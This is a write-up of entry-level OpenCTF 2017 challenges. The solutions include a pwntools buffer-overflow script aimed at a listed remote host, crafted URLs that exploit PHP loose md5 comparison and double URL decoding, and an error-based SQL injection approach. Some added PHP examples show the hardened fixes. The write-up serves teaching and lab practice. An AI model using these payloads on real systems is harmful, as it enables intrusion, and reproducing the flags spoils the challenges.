ISC2017 Geek Carnival: OpenCTF 2017 Write-up


OpenCTF 2017 was the "Geek Escape Room, Level 1" activity at the ISC2017 on-site booth.

The difficulty was entry level and fairly easy; several problems were taken verbatim from the XMAN 2017 summer camp qualifier and other CTF events.

zip (Misc100)

Hint: Ziperello, digits only

The archive password can be recovered with ARCHPR or Ziperello: 88888888. Extracting the archive gives the flag.

XCTF{ke&cVR3OHWHx42ZygOceozE6KIxz1Zzj}

pcap (Misc100)

Hint: wireshark, tcp, urldecode

Filter on TCP in Wireshark and an HTTP request shows up: GET /?q=XCTF%7BRSUJecDZ5xFp1z1X%26Nmpt%40PZSDQ%25Gbx6%7D HTTP/1.1\r\n. URL-decoding the q parameter gives the flag.

XCTF{RSUJecDZ5xFp1z1X&Nmpt@PZSDQ%Gbx6}

Maya Cipher (Crypto100)

Problem: While adventuring in the Americas, Brother Rat helped the last descendant of the Maya. To repay him, the descendant left him a slip of paper with a prophecy. What does the Maya prophecy say?
Hint: Maya numerals

Following the hint, rewrite the Maya numerals as Arabic numerals:

5 8 4 3 5 4 4 6 7 11
3 2 3 0 3 1 3 8 5 15
6 9 7 3 5 15 6 3 6 15
6 13 6 9 6 14 6 7 7 13

The largest value is 15, so each value is presumably one hexadecimal digit; rewriting the grid in hex gives:

5 8 4 3 5 4 4 6 7 B
3 2 3 0 3 1 3 8 5 F
6 9 7 3 5 F 6 3 6 F
6 D 6 9 6 E 6 7 7 D

Removing the spaces and line breaks gives 584354467B323031385F69735F636F6D696E677D; decoding this hex string as ASCII yields the flag.

XCTF{2018_is_coming}

RSA (Crypto100)

Problem: Welcome To The Openctf 2017, The c, p, q, and e are parameters for the RSA algorithm.

p = 9648423029010515676590551740010426534945737639235739800643989352039852507298491399561035009163427050370107570733633350911691280297777160200625281665378483
q = 11874843837980297032092405848653656852760910154543380907650040190704283358909208578251063047732443992230647903887510065547947313543299303261986053486569407
e = 65537
c = 69016319356655639210194946570348715066396274579181987745484908846232464436640043461016746215950609916307004870722625663551955221548688400875709926061159609460224830151731941059363474236594094101209402353834752606848369320902191207004466087273869348206495061740962728586464640440980967989689860668335396868406

Reference: CTF中RSA的常见攻击方法 (Common RSA attack methods in CTF)

Write an RSA decryption script and run it to get the flag.

Pitfall: the flag is the decimal number produced by the RSA decryption.

#!/usr/bin/env python
# encoding: utf-8

def egcd(a, b):
    # Extended Euclidean algorithm: returns (g, x, y) with a*x + b*y == g == gcd(a, b)
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = egcd(b % a, a)
        return (g, x - (b // a) * y, y)

def modinv(a, m):
    # Modular inverse of a modulo m; it exists only when gcd(a, m) == 1
    g, x, y = egcd(a, m)
    if g != 1:
        raise Exception('modular inverse does not exist')
    else:
        return x % m

def main():
    p = 9648423029010515676590551740010426534945737639235739800643989352039852507298491399561035009163427050370107570733633350911691280297777160200625281665378483
    q = 11874843837980297032092405848653656852760910154543380907650040190704283358909208578251063047732443992230647903887510065547947313543299303261986053486569407
    e = 65537
    c = 69016319356655639210194946570348715066396274579181987745484908846232464436640043461016746215950609916307004870722625663551955221548688400875709926061159609460224830151731941059363474236594094101209402353834752606848369320902191207004466087273869348206495061740962728586464640440980967989689860668335396868406
    n = p * q
    d = modinv(e, (p-1)*(q-1))   # private exponent: d * e == 1 (mod phi(n))
    m = pow(c, d, n)             # m = c^d mod n
    print ("flag: %d" % m)       # the flag is this decimal number itself

if __name__ == "__main__":
    main()

flag: 554035859905981120888026046266284028688068004006280022208626

jsjs (Web100)

Problem: http://202.112.51.184:8101/
Hint: disable JavaScript

Open the developer tools through the browser menu (right-click and F12 are disabled) and view the page source to get the flag.

XCTF{_O0oo0O_js_is_FUNNY!}

variacover (Web100)

Problem: http://202.112.51.184:8103/
Hint: parse_str() parses a parameter string into PHP variables

This problem tests PHP weak typing: md5('QNKCDZO') == "0e830400451993494058024219903391" == 0e830400451993494058024219903391 == 0. The problem is that a string starting with 0e followed only by digits is a numeric string which == treats as 0, so any other string whose md5 also starts with 0e passes the comparison, for example s878926199a.

Construct the URL: http://202.112.51.184:8103/?id=a[0]=s878926199a

XCTF{sTr_covcderd_AND_you_kn0W?}
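The loose comparison the write-up relies on, and the strict comparison that closes it, as an added example that is not part of the original write-up or the challenge's source. The secret 'QNKCDZO' and the candidate 's878926199a' are the values from the write-up; the function names are my own, and the parse_str() call reproduces the hint's behaviour of turning a[0]=... into a PHP array variable.

```php
<?php
// Added example, not from the original write-up. Shows why md5('QNKCDZO')
// compares equal to another "0e..." digest under PHP's loose ==, and how a
// strict, constant-time comparison closes the hole.

function looseHashMatch(string $secret, string $candidate): bool {
    // Both digests are numeric strings of the form "0e<digits>", i.e. 0 * 10^N,
    // so == compares them numerically and both are 0.
    return md5($secret) == md5($candidate);
}

function strictHashMatch(string $secret, string $candidate): bool {
    // hash_equals() compares byte for byte in constant time; numeric-string
    // juggling never applies.
    return hash_equals(md5($secret), md5($candidate));
}

// parse_str() turns "a[0]=s878926199a" into $vars['a'][0]; this is the hint's
// mechanism for letting a request parameter reach the comparison.
function parseChallengeParam(string $raw): array {
    parse_str($raw, $vars);
    return $vars;
}

$vars = parseChallengeParam('a[0]=s878926199a');
$candidate = $vars['a'][0];

printf("md5(secret)    = %s\n", md5('QNKCDZO'));
printf("md5(candidate) = %s\n", md5($candidate));
printf("loose  ==      : %s\n", looseHashMatch('QNKCDZO', $candidate) ? 'true' : 'false');
printf("hash_equals()  : %s\n", strictHashMatch('QNKCDZO', $candidate) ? 'true' : 'false');
```

Both digests print with a 0e prefix, the loose comparison reports true and hash_equals() reports false. The same numeric-string rule still holds on PHP 8, where comparing two numeric strings with == remains a numeric comparison; === or hash_equals() is the fix.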

urldecode (Web100)

Problem: http://202.112.51.184:8102/
Hint: the server decodes the parameter once, and urldecode() decodes it again

Here is the source code I wrote myself:

<meta charset="utf-8">
<?php
error_reporting(0);
if ($_GET['id'] == ""){
    echo "请给id赋值";
    exit();
}
// Case-insensitive filter on the value as the server decoded it (the
// original used eregi(), which no longer exists in PHP 7+)
if (preg_match('/OPENCTF/i', $_GET['id'])){
    echo "你距离flag只有1厘米!<?php tips: urldecode是一个php的函数>";
    exit();
}else{
    echo "你是来参加什么比赛的?";
}

// Second decode: a %25-encoded value passes the filter above and becomes
// plain text only here
$_GET['id'] = urldecode($_GET['id']);
if ($_GET['id'] == "OPENCTF"){
  echo "<h1>XCTF{UrlDeCode_oL_yOu_lol!} </h1>";
}

This problem tests double encoding. Construct the URL: http://202.112.51.184:8102/?id=%254FPENCTF

Pitfall: the id must be OPENCTF with every character uppercase.

XCTF{UrlDeCode_oL_yOu_lol!}
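The two decoding steps from the hint, run offline, as an added example that is not the challenge's real source. serverDecode() stands in for the percent-decoding PHP applies when it fills $_GET (an assumption made so the script runs without a web server); challengeCheck() mirrors the filter-then-urldecode() order of the write-up's source, and hardenedCheck() shows the version where filter and comparison see the same string.

```php
<?php
// Added example, not the challenge's real source. Traces how %254FPENCTF
// survives one decode and becomes OPENCTF after a second one.

function serverDecode(string $rawQueryValue): string {
    // Simulates the single percent-decoding PHP performs when building $_GET.
    return urldecode($rawQueryValue);
}

function challengeCheck(string $id): string {
    // Filter runs on the once-decoded value, so "%4FPENCTF" does not match...
    if (preg_match('/OPENCTF/i', $id)) {
        return 'blocked by filter';
    }
    // ...but a second urldecode() turns %4F into "O" before the comparison.
    $id = urldecode($id);
    return $id === 'OPENCTF' ? 'flag' : 'no flag';
}

function hardenedCheck(string $id): string {
    // No extra decoding: the filter and the comparison operate on the same
    // string, so the only value that reaches "flag" is the literal OPENCTF,
    // which the filter already rejects.
    if (preg_match('/OPENCTF/i', $id)) {
        return 'blocked by filter';
    }
    return $id === 'OPENCTF' ? 'flag' : 'no flag';
}

$raw = '%254FPENCTF';
$afterServer = serverDecode($raw);

echo "after server decode : $afterServer\n";
echo "challenge handler   : ", challengeCheck($afterServer), "\n";
echo "hardened handler    : ", hardenedCheck($afterServer), "\n";
```

The server decode turns %254FPENCTF into %4FPENCTF, which contains no "OPENCTF" and passes the filter; the challenge handler's second urldecode() yields OPENCTF and prints "flag", while the hardened handler compares %4FPENCTF as received and prints "no flag". The general rule is to decode input exactly once, at the boundary, and to run every check on that one canonical form.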

SQL injection (Web100)

Problem: http://202.112.51.184:8201/

A quick test shows the table has rows with id 1 and id 2.

Error messages are output by default, so error-based injection with Polygon() leaks the database name: security; table name: article; column name: id.

A simple injection query then yields the flag.

XCTF{ut9x2a5f8t9e6s3a4g5j}
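The pattern behind this challenge, an id parameter placed into SQL text with database errors echoed to the client, next to a hardened version, as an added example that is not the challenge's code. The table and column names follow the write-up (article.id); the in-memory SQLite database, the sample rows and the function names are my own assumptions so the script runs offline (pdo_sqlite is assumed to be available).

```php
<?php
// Added example, not the challenge's code. Contrasts string-built SQL with a
// validated, parameterised query and generic client-side error handling.

function vulnerableQuery(PDO $db, string $id): array {
    // The id becomes part of the SQL text, so any SQL inside it is executed,
    // and with DBMS errors echoed to the page the error text leaks schema
    // details. Shown for contrast only; it is not called below.
    return $db->query("SELECT * FROM article WHERE id = $id")->fetchAll(PDO::FETCH_ASSOC);
}

function hardenedQuery(PDO $db, string $id): array {
    // 1. Enforce the expected type before the value goes anywhere near SQL.
    if (!preg_match('/^\d+$/', $id)) {
        throw new InvalidArgumentException('id must be a non-negative integer');
    }
    // 2. Bind the value as a parameter; it travels separately from the SQL text.
    $stmt = $db->prepare('SELECT * FROM article WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Throwaway in-memory database with constructed sample rows (assumption).
$db = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);
$db->exec('CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO article VALUES (1, 'first'), (2, 'second')");

print_r(hardenedQuery($db, '2'));

foreach (['2 OR 1=1', 'abc', ''] as $bad) {
    try {
        hardenedQuery($db, $bad);
    } catch (InvalidArgumentException $e) {
        // 3. Keep the detail in the server log; the client sees a generic message.
        error_log("rejected id parameter: " . $e->getMessage());
        echo "Bad request\n";
    }
}
```

The valid id returns the matching row; each malformed id is rejected before any SQL runs and only "Bad request" reaches the client. Turning off display_errors in production closes the second half of this challenge's weakness, the DBMS error text that made error-based extraction possible.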

OpenReverse (Reverse100)

Hint: dynamic debugging in OllyDbg

Debug dynamically in OllyDbg: set a breakpoint at 00401147 and run.

Enter any key; the program stops at the breakpoint and the flag can be seen in memory.

XCTF{5eacs6y8p1o9gitc9521}

blind (Pwn100)

Problem: nc 202.112.51.184 8301
Hint: 72 bytes of junk

The service returns a memory address, and it is the same address on every connection.

Following the hint, build 72 bytes of junk and then overwrite EIP with the returned memory address.

#!/usr/bin/env python
# encoding: utf-8

from pwn import *

p = remote('202.112.51.184', 8301)
junk = b'A' * 72                  # 72 bytes of padding up to the saved return address
payload = junk + p64(0x40060d)    # overwrite it with the address the service returned
p.sendline(payload)
print (p.recvall())
p.close()

XCTF{sQ^yeLZKBVkoZ7^zOtigV5xsepBY&bB7}

getshell (Pwn100)

Problem: nc 202.112.51.184 8302

This is a reused problem, so no explanation here. Original write-up: https://github.com/ernw/ctf-writeups/tree/master/csaw2016/aul

XCTF{q0Cr1iwqlWW1m8ejiK[email protected]&}

Source: impakho.com | Author: impakho
